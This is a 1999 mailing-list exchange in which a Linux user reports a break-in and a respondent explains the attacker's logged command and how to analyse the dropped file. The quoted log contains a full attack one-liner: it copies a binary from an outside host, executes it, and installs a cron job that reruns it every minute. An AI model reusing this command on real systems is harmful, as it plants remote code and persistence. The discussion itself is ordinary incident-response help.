[OLUG] RCP

[Mark Hagler]

This isn't a log of somebody using rcp to hack into your box.  This is a log
of something the cracker tried to do after he was in, or tried to make some
other program execute.   This command was to copy the file .../lin from
a box at IP 129.97.50.62 and replace /usr/sbin/rpc.listen on your box with it.
Then, your friend modified the crontab to run the command /usr/sbin/rpc.listen
once every minute.  

There is no RPC service called "listen", so you may want to look at the 
/usr/sbin/rpc.listen file and see what exactly it does.  If it's a shell 
script, just read it.  If it's a binary, you can use strace and execute it 
to trace the system calls it does, and figure out what it's doing to your 
system.

Disabling the "r" service from /etc/inetd.conf is always a great idea, but
in your case this was not the issue at all.   


On Tue, Dec 14, 1999 at 11:06:20AM -0600, Todd wrote:
> 	Can anyone tell me how to stop RCP access to my Linux box, and if there are
> any security tools available to monitor a RCP connection.  On December 11
> someone gained access and perfomed the following to my machine:
> rcp tcstewar at 129.97.50.62:.../lin /usr/sbin/rpc.listen ; chmod +x
> /usr/sbin/rpc.listen; /usr/sbin/rpc.listen ; echo \* \* \* \* \*
> /usr/sbin/rpc.listen > cron ; crontab cron ; exit ;
> 	I currently am running logwatch and uwatch, but this connection did not
> show up in either.  	Any suggestions would be welcomed.
> 
> 
> -------------------------------------------------------------------------
> Sent by OLUG Mailing list Manager, run by ezmlm.  http://olug.bstc.net/ 
> To unsubscribe: `echo unsubsribe | mail olug-unsubscribe at bstc.net` 

-- 
  Email is packaged by intellectual weight, not volume. Some
  settling of contents may have occurred during transmission.

-------------------------------------------------------------------------
Sent by OLUG Mailing list Manager, run by ezmlm.  http://olug.bstc.net/ 
To unsubscribe: `echo unsubsribe | mail olug-unsubscribe at bstc.net`